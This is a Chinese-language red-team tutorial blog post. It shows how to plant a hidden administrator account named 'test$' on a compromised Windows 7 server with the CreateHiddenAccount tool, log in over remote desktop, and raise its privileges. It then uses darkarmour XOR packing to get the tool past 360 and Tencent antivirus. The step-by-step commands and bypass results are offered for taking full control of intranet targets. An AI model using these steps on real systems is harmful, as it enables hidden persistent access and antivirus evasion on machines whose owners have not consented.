内网攻防之一键创建隐藏账号

admin 2025年2月15日23:23:48评论14 views字数 1742阅读5分48秒阅读模式

声明

以下内容,均为文章作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

长白山攻防实验室拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明长白山攻防实验室允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。

0x01 工具介绍

常见的创建隐藏账号的两种方法,一种是直接在用户名后加上 $ 符进行创建,一种是利用注册表克隆用户创建,后者隐藏效果较前者相比更好些,但是操作较为复杂。
该工具由WgpSec狼组安全团队开发,工具将注册表克隆账号的过程工具化,工具里除了添加隐藏账号外,还添加了检查隐藏账号、删除隐藏账号的功能,红队、蓝队在攻击、防守场景时均适用此工具。

0x02 下载

下载地址:
https://github.com/wgpsec/CreateHiddenAccount 

0x03 帮助信息

使用 CreateHiddenAccount.exe -h 查看帮助信息
  • -c 检查当前系统的隐藏账户
  • -cu 设置要克隆的用户,默认 Administrator 用户
  • -d 指定要删除的用户名,如果添加的用户名不是以 $ 结尾,则工具会自动在用户名后添加上 $
  • -oc 只创建隐藏用户,不对注册表进行操作,避免被杀软拦截
  • -p 指定添加的用户的密码
  • -u 指定要添加的用户名,如果添加的用户名不是以 $ 结尾,则工具会自动在用户名后添加上 $
  • -v 查看当前工具版本
内网攻防之一键创建隐藏账号

0x04 内网实战

目标环境简介:
在内网环境下已通过web服务器(windows 7)存在的公开漏洞获取到目标shell,部分文件夹没有权限访问,该目标服务器只允许8080、3389端口通信,允许连接远程桌面,但由于目标用户密码复杂程度过高无法获取。
上传CreateHiddenAccount工具,利用该工具创建具有管理员权限的隐藏账户。
内网攻防之一键创建隐藏账号
进入shell终端,执行该工具添加一个用户名为 test 的隐藏账号,工具会自动在用户名后添加 $ 符,因此创建后的用户名为 test$。
CreateHiddenAccount_upx_v0.2.exe -h //判断该工具是否可以执行
内网攻防之一键创建隐藏账号
CreateHiddenAccount_upx_v0.2.exe -u test -p test //创建隐藏账户test$ 密码test
内网攻防之一键创建隐藏账号
CreateHiddenAccount_upx_v0.2.exe -c //检查当前系统创建的隐藏账号
内网攻防之一键创建隐藏账号
test$隐藏用户创建成功,使用test$隐藏账户登录远程桌面。
内网攻防之一键创建隐藏账号
成功远程登录,查看当前用户信息,并将test$添加管理员权限。
内网攻防之一键创建隐藏账号
内网攻防之一键创建隐藏账号
删除 test$隐藏账号。
CreateHiddenAccount_upx_v0.2.exe -d test账户成功被删除。
内网攻防之一键创建隐藏账号

该工具可结合免杀方式进行内网环境中测试。以下是免杀处理过程:

未作免杀前在线病毒样本检测结果。

内网攻防之一键创建隐藏账号
利用darkarmour对该工具进行免杀处理后生成名为demo.exe文件:
sudo python3darkarmour.py -f /home/kali/下载/darkarmour/CreateHiddenAccount_v0.2.exe --encrypt xor --jmp -o/home/kali/下载/darkarmour/demo.exe--loop 5
免杀处理后成功绕360木马云查杀,下面是360木马云查杀检测结果:

内网攻防之一键创建隐藏账号

免杀处理后成功绕360木马云查杀,下面是360木马云查杀检测结果:

内网攻防之一键创建隐藏账号

内网攻防之一键创建隐藏账号

免杀处理后成功绕腾讯云查杀,下面是腾讯云查杀检测结果:

内网攻防之一键创建隐藏账号

内网攻防之一键创建隐藏账号

最后查看免杀处理后工具功能完整性,程序正常执行。以下是运行结果:
内网攻防之一键创建隐藏账号

0x05 总结

该工具将注册表克隆账号的过程工具化,大大减少频繁输入命令行、权限等问题,工具里是利用 Windows API 创建用户,具有一定的免杀能力。结合免杀、加壳相关技术,可以在内网中一键创建隐藏账号达到完整控制目标权限的目的。

0x06 参考

  1. https://github.com/wgpsec/CreateHiddenAccount

  2. https://github.com/bats3c/darkarmour

内网攻防之一键创建隐藏账号
内网攻防之一键创建隐藏账号
内网攻防之一键创建隐藏账号

▇ 扫码关注我们 ▇

长白山攻防实验室

学习最新技术知识

原文始发于微信公众号(长白山攻防实验室):内网攻防之一键创建隐藏账号

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月15日23:23:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网攻防之一键创建隐藏账号https://cn-sec.com/archives/1076185.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息